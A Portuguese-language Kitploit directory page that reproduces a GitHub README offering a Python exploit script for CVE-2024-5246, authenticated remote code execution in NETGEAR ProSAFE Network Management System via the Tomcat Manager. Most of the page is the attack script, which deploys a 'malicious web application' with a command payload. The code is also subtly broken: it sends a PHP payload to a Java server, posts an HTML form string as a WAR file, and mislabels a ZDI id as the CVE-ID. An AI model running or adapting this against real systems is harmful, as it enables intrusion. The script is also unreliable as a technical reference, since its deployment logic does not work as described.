Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-5246 — Prova de conceito em Python demonstrando execução remota de código autenticada no NETGEAR ProSAFE Network Management System por meio do Apache Tomcat vulnerável, implantando um aplicativo web malicioso. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/cve-2024-5246
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

Prova de conceito em Python demonstrando execução remota de código autenticada no NETGEAR ProSAFE Network Management System por meio do Apache Tomcat vulnerável, implantando um aplicativo web malicioso.

Ver Repositório
22há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito (PoC) para Execução Remota de Código no NETGEAR ProSAFE Network Management System

Este repositório contém um script de Prova de Conceito (PoC) demonstrando uma vulnerabilidade de Execução Remota de Código (RCE) no NETGEAR ProSAFE Network Management System. A vulnerabilidade deve-se ao uso de uma versão vulnerável do Apache Tomcat no instalador do produto. Este problema permite que atacantes autenticados executem código arbitrário em instalações afetadas.

Descrição da Vulnerabilidade

CVE-ID: ZDI-CAN-22868

Visão Geral: O NETGEAR ProSAFE Network Management System contém uma vulnerabilidade de execução remota de código devido ao uso de uma versão vulnerável do Apache Tomcat. Um atacante com autenticação pode explorar esta vulnerabilidade para executar código arbitrário no sistema afetado no contexto de SYSTEM.

Versões Afetadas:

  • Versões do NETGEAR ProSAFE Network Management System com versões vulneráveis do Apache Tomcat.

Autenticação: Necessária

Detalhes da PoC

Esta PoC demonstra como um atacante pode explorar a vulnerabilidade para alcançar execução remota de código. A falha específica reside no instalador do produto devido ao uso de uma versão desatualizada ou vulnerável do Apache Tomcat.

Script da PoC

O script a seguir ilustra como explorar esta vulnerabilidade de RCE. Certifique-se de ter as permissões apropriadas antes de executar esta PoC.

Importante: Esta PoC é apenas para fins educacionais e não deve ser usada para atividades não autorizadas ou maliciosas.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""
# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

Explicação

  1. Configuração: Defina target_url para a URL do Tomcat Manager do sistema alvo e atualize username e password com credenciais válidas.
  2. Payload: O payload é um script PHP simples que executa um comando do sistema para demonstrar a execução de código.
  3. Função de Exploração: A função exploit_rce() envia uma requisição POST para implantar a aplicação web maliciosa.
  4. Implantação: O script tenta implantar uma nova aplicação web com o payload malicioso e exibe o resultado.

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar esta vulnerabilidade no sistema alvo. Testes não autorizados são ilegais e antiéticos.
  • Ambiente de Teste: Realize testes em um ambiente controlado para evitar impactos em sistemas de produção.
  • Uso Ético: Use esta PoC de forma responsável e apenas em contextos autorizados.

Mitigação

Para mitigar esta vulnerabilidade, tome as seguintes medidas:

  1. Atualizar o Tomcat: Atualize para uma versão do Apache Tomcat que tenha corrigido a vulnerabilidade.
  2. Proteger o Acesso: Garanta que o Tomcat Manager e outras interfaces sensíveis estejam protegidas e acessíveis apenas a usuários autorizados.
  3. Revisar Configurações: Revise e endureça regularmente a configuração de aplicações web e servidores.

Seguindo estes passos, você pode resolver a vulnerabilidade de RCE no NETGEAR ProSAFE Network Management System e melhorar a segurança geral.


Este README.md fornece uma descrição detalhada e o script da PoC para a vulnerabilidade de RCE, incluindo instruções de configuração, considerações e conselhos de mitigação.

Baixar ferramenta